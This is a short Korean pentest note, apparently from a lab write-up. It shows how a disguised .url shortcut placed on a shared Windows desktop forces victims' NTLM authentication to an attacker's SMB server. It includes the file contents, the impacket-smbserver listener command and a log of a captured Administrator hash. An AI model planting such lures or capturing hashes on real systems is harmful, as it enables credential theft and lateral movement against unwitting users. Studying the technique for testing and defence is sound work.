Windows 구 버전에서는 일부 확장자가 포함된 경로로 파일 탐색을 하는 즉시 명령 실행을 하는 확장자가 존재합니다. 대표적인 확장자는 scf(Shell Command File)이며, 이 외에도 파일을 통해 공격자의 서버로 NTLM 인증을 강제로 하게 함으로써 NTLM 챌린지 값을 탈취할 수 있습니다.
오늘 날 최신 버전의 Windows에서는 더 이상 scf 파일을 자동으로 실행하지 않아 이것으로 NTLM 정보를 탈취하는 것은 불가능하지만 url 확장 파일을 C:\Users\Public\Desktop 과 같이 모두가 공유하는 바탕화면 경로 등에 그럴듯한 파일로 올려두고, 다른 사용자가 클릭 시 해당 사용자의 NTLM 챌린지 값 탈취는 가능합니다.
# hack.url 파일 내용
[InternetShortcut]
URL=\\192.168.200.132\share
# 희생자가 파일을 클릭할 때까지 SMB 서버를 수신 상태로 대기
impacket-smbserver share . -smb2support
# 희생자가 url 파일 클릭 후 탈취에 성공한 NTLM 챌린지
┌──(root㉿kali)-[~/Pentest/Machine]
└─# impacket-smbserver share . -smb2support
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (192.168.200.1,17309)
[*] AUTHENTICATE_MESSAGE (MicrosoftAccount\Administrator,wiki)
[*] User wiki\Administrator authenticated successfully
[*] Administrator::MicrosoftAccount:aaaaaaaaaaaaaaaa:04f496fa83c8060ebc3eb9bf248...
